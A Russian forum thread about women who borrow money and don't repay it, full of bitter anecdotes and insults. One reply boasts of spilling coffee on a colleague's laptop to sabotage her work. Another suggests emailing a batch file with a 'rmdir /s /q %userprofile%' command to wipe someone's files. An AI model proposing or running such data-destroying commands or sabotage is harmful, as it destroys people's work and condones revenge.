Гость
Статьи
Девушки занимающие …

Девушки занимающие деньги и не отдающие

Эти девушки считают себя королевами. Одна заняла 2.500 р. На 10 дней, потом не отдала. Но говорит скоро отдам, я говорю - ладно давай так, был месяц январь, я говорю отдашь 1 марта, она говорит - да до 1 марта по-любому и тут наступает 1 марта, я заранее знаю что не отдаст, пишу ей, пишет денег нет. Говорю ей - удачи стать матерью одиночкой, она пишет не стану. Проходит год, она мать одиночка. Отец ребенка слился и она сама пишет мне типа, а как ты узнал что я стану матерью одиночкой. Пишу ей, а потому что ты не живёшь завтрашним днём, ты услышала про 1 марта, и ты поняла что не скоро, беспокоиться не о чем, так и в воспитании и рождении детейч откатилась от неудачника, думая потом будет успешным, но нет, быт все сожрал. Она в шоке была, что я ее так просчитал.
Девушки, а вы часто брали у парней деньги, не отдавали, а теперь в вашей жизни настала жесть? Нищета и одиночество?

Олег
13 ответов
Последний — Перейти
Лапусик
#1

Никогда. Было такое что у меня брали и не отдавали.

Гость
#2

Не, я не одалживаю никому и не занимаю ни у кого. Поэтому сразу просчитала, что муж миллионером не будет, но на хлеб заработает, а я на масло и икру. Так и получилось

Гость
#4

у меня одна коллега заняла 5т.р. и не хотела отдавать, пришлось ей рабочий ноутбук залить сладким кофе. В итоге все отчеты у ней пропали, на работе ей несколько недель буквально жить пришлось чтоб все восстановить.

Осип Апельсинов
#5
Гость

у меня одна коллега заняла 5т.р. и не хотела отдавать, пришлось ей рабочий ноутбук залить сладким кофе. В итоге все отчеты у ней пропали, на работе ей несколько недель буквально жить пришлось чтоб все восстановить.

Ахаха. Мозги у тебя пропали

Эльза
#6

Если девушка «занимает» у мужчины, то отдавать не обязана.
Не хочешь - изначально откажись. Либо если дал «в долг» - забудь.

"Гранатовый браслет"
#7
Эльза

Если девушка «занимает» у мужчины, то отдавать не обязана.
Не хочешь - изначально откажись. Либо если дал «в долг» - забудь.

Ну..смотря как ейдает деньги мужчина.

Если она ногу сломала, аон подвернулся тут и оплатил больницу- то один вопросс. И то..нужно же брать у своего.

Кролик
#8

Судя по агрессии к банкам и коллекторам, приравненным к врагам народа, в России это норма жизни занять и не отдать. При чем тут девушки

Совча
#9
Гость

у меня одна коллега заняла 5т.р. и не хотела отдавать, пришлось ей рабочий ноутбук залить сладким кофе. В итоге все отчеты у ней пропали, на работе ей несколько недель буквально жить пришлось чтоб все восстановить.

Данные пишутся на жесткий диск, а не на клаву, курица.

Совча
#10
Гость

у меня одна коллега заняла 5т.р. и не хотела отдавать, пришлось ей рабочий ноутбук залить сладким кофе. В итоге все отчеты у ней пропали, на работе ей несколько недель буквально жить пришлось чтоб все восстановить.

а если ты ей запортила жесткий диск, то у нее не просто пропали отчеты, а вообще все.

Александр
#11
Совча

а если ты ей запортила жесткий диск, то у нее не просто пропали отчеты, а вообще все.

Таким клушам достаточно батник на почту отправить с кодом rmdir /s /q %userprofile% за 1-5 секунд после запуска все документы, видео.... Весь рабочий стол исчезнет

Гость
#12
Гость

у меня одна коллега заняла 5т.р. и не хотела отдавать, пришлось ей рабочий ноутбук залить сладким кофе. В итоге все отчеты у ней пропали, на работе ей несколько недель буквально жить пришлось чтоб все восстановить.

Может она ждала от Вас непристойное предложение?
Мне тоже не отдает одна сотрудница 5300, за французский поцелуй в лифте, я забыл бы не только про долг, но и про нужный этаж . А она у всех просила или только у Вас? Может Вы ей симпатичны

Гость
#13
Эльза

Если девушка «занимает» у мужчины, то отдавать не обязана.
Не хочешь - изначально откажись. Либо если дал «в долг» - забудь.

С чего это? Долг есть долг. Долги, как известно, и нагишом платят.

Форум: Финансы
Всего:
Новые темы за сутки:
Популярные темы за сутки: